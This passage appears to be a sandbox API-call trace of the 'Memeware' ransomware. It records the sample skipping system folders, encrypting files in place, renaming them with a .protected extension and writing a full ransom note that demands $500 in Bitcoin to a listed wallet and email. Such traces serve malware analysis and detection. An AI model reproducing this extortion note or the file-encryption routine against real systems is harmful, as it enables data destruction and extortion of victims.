nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0055.392] lstrlenA (lpString="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") returned 684 [0055.393] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0055.393] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0055.393] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, 
lpOverlapped=0x0) returned 1 [0055.393] CloseHandle (hObject=0xb4) returned 1 [0055.393] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0055.393] lstrcmpiW (lpString1="Proof.fr", lpString2="Windows") returned -1 [0055.393] lstrcmpiW (lpString1="Proof.fr", lpString2="Program Files") returned 1 [0055.393] lstrcmpiW (lpString1="Proof.fr", lpString2="Program Files (x86)") returned 1 [0055.393] lstrcmpiW (lpString1="Proof.fr", lpString2="$Recycle.bin") returned 1 [0055.393] lstrcmpiW (lpString1="Proof.fr", lpString2="System Volume Information") returned -1 [0055.393] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr") returned 75 [0055.393] lstrcmpW (lpString1="Proof.fr", lpString2=".") returned 1 [0055.393] lstrcmpW (lpString1="Proof.fr", lpString2="..") returned 1 [0055.393] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\*") returned 77 [0055.393] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x4a9270 [0055.393] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0055.394] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0055.394] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0055.394] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0055.394] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0055.394] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\.") returned 77 [0055.394] lstrcmpW (lpString1=".", lpString2=".") returned 0 
[0055.394] FindNextFileW (in: hFindFile=0x4a9270, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0055.394] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0055.394] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0055.394] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0055.394] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0055.394] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0055.394] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\..") returned 78 [0055.394] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0055.394] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0055.394] FindNextFileW (in: hFindFile=0x4a9270, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0055.394] lstrcmpiW (lpString1="Proof.cab", lpString2="Windows") returned -1 [0055.394] lstrcmpiW (lpString1="Proof.cab", lpString2="Program Files") returned 1 [0055.394] lstrcmpiW (lpString1="Proof.cab", lpString2="Program Files (x86)") returned 1 [0055.394] lstrcmpiW (lpString1="Proof.cab", lpString2="$Recycle.bin") returned 1 [0055.394] lstrcmpiW (lpString1="Proof.cab", lpString2="System Volume Information") returned -1 [0055.394] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 85 [0055.394] StrStrIW (lpFirst="Proof.cab", lpSrch=".protected") returned 0x0 [0055.394] lstrcmpW (lpString1="Proof.cab", lpString2="RESTORE_FILES.txt") returned -1 [0055.394] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0055.394] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | 
out: pbData=0x47b7a8*, pdwDataLen=0x295eee4*=0x30) returned 1 [0055.394] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0055.395] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 85 [0055.395] StrStrW (lpFirst="Proof.cab", lpSrch=".txt") returned 0x0 [0055.395] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 85 [0055.395] StrStrW (lpFirst="Proof.cab", lpSrch=".rar") returned 0x0 [0055.395] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 85 [0055.395] StrStrW (lpFirst="Proof.cab", lpSrch=".zip") returned 0x0 [0055.395] ReadFile (in: hFile=0x150, lpBuffer=0x4acae0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4acae0*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0055.408] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0055.408] WriteFile (in: hFile=0x150, lpBuffer=0x4acae0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4acae0*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0055.408] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0055.408] WriteFile (in: hFile=0x150, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 
| out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0055.420] WriteFile (in: hFile=0x150, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0055.420] CloseHandle (hObject=0x150) returned 1 [0055.752] wnsprintfW (in: pszDest=0x4acae0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab.protected") returned 95 [0055.752] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab.protected" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.cab.protected")) returned 1 [0055.752] FindNextFileW (in: hFindFile=0x4a9270, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0055.752] lstrcmpiW (lpString1="Proof.msi", lpString2="Windows") returned -1 [0055.752] lstrcmpiW (lpString1="Proof.msi", lpString2="Program Files") returned 1 [0055.752] lstrcmpiW (lpString1="Proof.msi", lpString2="Program Files (x86)") returned 1 [0055.752] lstrcmpiW (lpString1="Proof.msi", lpString2="$Recycle.bin") returned 1 [0055.752] lstrcmpiW (lpString1="Proof.msi", lpString2="System Volume Information") returned -1 [0055.753] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 85 [0055.753] StrStrIW (lpFirst="Proof.msi", lpSrch=".protected") returned 0x0 [0055.753] lstrcmpW (lpString1="Proof.msi", lpString2="RESTORE_FILES.txt") returned -1 [0055.753] 
CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0055.753] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295eee4*=0x30) returned 1 [0055.753] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0055.754] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 85 [0055.754] StrStrW (lpFirst="Proof.msi", lpSrch=".txt") returned 0x0 [0055.754] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 85 [0055.754] StrStrW (lpFirst="Proof.msi", lpSrch=".rar") returned 0x0 [0055.754] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 85 [0055.754] StrStrW (lpFirst="Proof.msi", lpSrch=".zip") returned 0x0 [0055.754] ReadFile (in: hFile=0x150, lpBuffer=0x4acae0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4acae0*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0055.796] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0055.796] WriteFile (in: hFile=0x150, lpBuffer=0x4acae0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4acae0*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0055.797] SetFilePointerEx (in: 
hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0055.797] WriteFile (in: hFile=0x150, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0055.834] WriteFile (in: hFile=0x150, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0055.834] CloseHandle (hObject=0x150) returned 1 [0056.029] wnsprintfW (in: pszDest=0x4acae0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi.protected") returned 95 [0056.029] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi.protected" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.msi.protected")) returned 1 [0056.029] FindNextFileW (in: hFindFile=0x4a9270, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0056.029] lstrcmpiW (lpString1="Proof.xml", lpString2="Windows") returned -1 [0056.029] lstrcmpiW (lpString1="Proof.xml", lpString2="Program Files") returned 1 [0056.029] lstrcmpiW (lpString1="Proof.xml", lpString2="Program Files (x86)") returned 1 [0056.029] lstrcmpiW (lpString1="Proof.xml", lpString2="$Recycle.bin") returned 1 [0056.029] lstrcmpiW (lpString1="Proof.xml", lpString2="System Volume Information") returned -1 [0056.029] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All 
Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 85 [0056.029] StrStrIW (lpFirst="Proof.xml", lpSrch=".protected") returned 0x0 [0056.029] lstrcmpW (lpString1="Proof.xml", lpString2="RESTORE_FILES.txt") returned -1 [0056.029] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0056.030] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295eee4*=0x30) returned 1 [0056.030] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0056.030] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 85 [0056.030] StrStrW (lpFirst="Proof.xml", lpSrch=".txt") returned 0x0 [0056.030] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 85 [0056.030] StrStrW (lpFirst="Proof.xml", lpSrch=".rar") returned 0x0 [0056.030] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 85 [0056.030] StrStrW (lpFirst="Proof.xml", lpSrch=".zip") returned 0x0 [0056.030] ReadFile (in: hFile=0x150, lpBuffer=0x4acae0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4acae0*, lpNumberOfBytesRead=0x295ef04*=0x5b2, lpOverlapped=0x0) returned 1 [0056.046] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffa4e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0056.046] WriteFile 
(in: hFile=0x150, lpBuffer=0x4acae0*, nNumberOfBytesToWrite=0x5b2, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4acae0*, lpNumberOfBytesWritten=0x295ef04*=0x5b2, lpOverlapped=0x0) returned 1 [0056.046] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0056.046] WriteFile (in: hFile=0x150, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0056.046] WriteFile (in: hFile=0x150, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0056.046] CloseHandle (hObject=0x150) returned 1 [0056.048] wnsprintfW (in: pszDest=0x4acae0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.protected") returned 95 [0056.048] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.protected" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml.protected")) returned 1 [0056.050] FindNextFileW (in: hFindFile=0x4a9270, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0056.050] FindClose (in: hFindFile=0x4a9270 | out: hFindFile=0x4a9270) returned 1 [0056.050] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\RESTORE_FILES.txt") returned 93 [0056.050] 
CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\RESTORE_FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0056.050] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0056.050] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: 
lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0056.051] lstrlenA (lpString="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") returned 684 [0056.051] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0056.051] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0056.051] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0056.051] CloseHandle (hObject=0xb4) returned 1 [0056.052] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0056.052] lstrcmpiW (lpString1="Proofing.msi", lpString2="Windows") returned -1 [0056.052] lstrcmpiW (lpString1="Proofing.msi", lpString2="Program Files") returned 1 [0056.052] lstrcmpiW (lpString1="Proofing.msi", lpString2="Program Files (x86)") returned 1 [0056.052] lstrcmpiW (lpString1="Proofing.msi", lpString2="$Recycle.bin") returned 1 [0056.052] lstrcmpiW (lpString1="Proofing.msi", lpString2="System Volume Information") returned -1 [0056.052] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 79 [0056.052] StrStrIW (lpFirst="Proofing.msi", lpSrch=".protected") returned 0x0 [0056.052] lstrcmpW (lpString1="Proofing.msi", lpString2="RESTORE_FILES.txt") returned -1 [0056.052] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0056.052] 
CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0056.052] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0056.053] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 79 [0056.053] StrStrW (lpFirst="Proofing.msi", lpSrch=".txt") returned 0x0 [0056.053] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 79 [0056.053] StrStrW (lpFirst="Proofing.msi", lpSrch=".rar") returned 0x0 [0056.053] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi") returned 79 [0056.053] StrStrW (lpFirst="Proofing.msi", lpSrch=".zip") returned 0x0 [0056.053] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0056.062] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0056.062] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0056.063] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0056.063] WriteFile (in: hFile=0xb4, 
lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0056.112] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0056.112] CloseHandle (hObject=0xb4) returned 1 [0056.129] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi.protected") returned 89 [0056.129] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.msi.protected" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.msi.protected")) returned 1 [0056.130] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0056.130] lstrcmpiW (lpString1="Proofing.xml", lpString2="Windows") returned -1 [0056.130] lstrcmpiW (lpString1="Proofing.xml", lpString2="Program Files") returned 1 [0056.130] lstrcmpiW (lpString1="Proofing.xml", lpString2="Program Files (x86)") returned 1 [0056.130] lstrcmpiW (lpString1="Proofing.xml", lpString2="$Recycle.bin") returned 1 [0056.130] lstrcmpiW (lpString1="Proofing.xml", lpString2="System Volume Information") returned -1 [0056.130] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned 79 [0056.130] StrStrIW (lpFirst="Proofing.xml", lpSrch=".protected") returned 0x0 [0056.130] lstrcmpW 
(lpString1="Proofing.xml", lpString2="RESTORE_FILES.txt") returned -1 [0056.130] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0056.130] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0056.131] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0056.131] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All 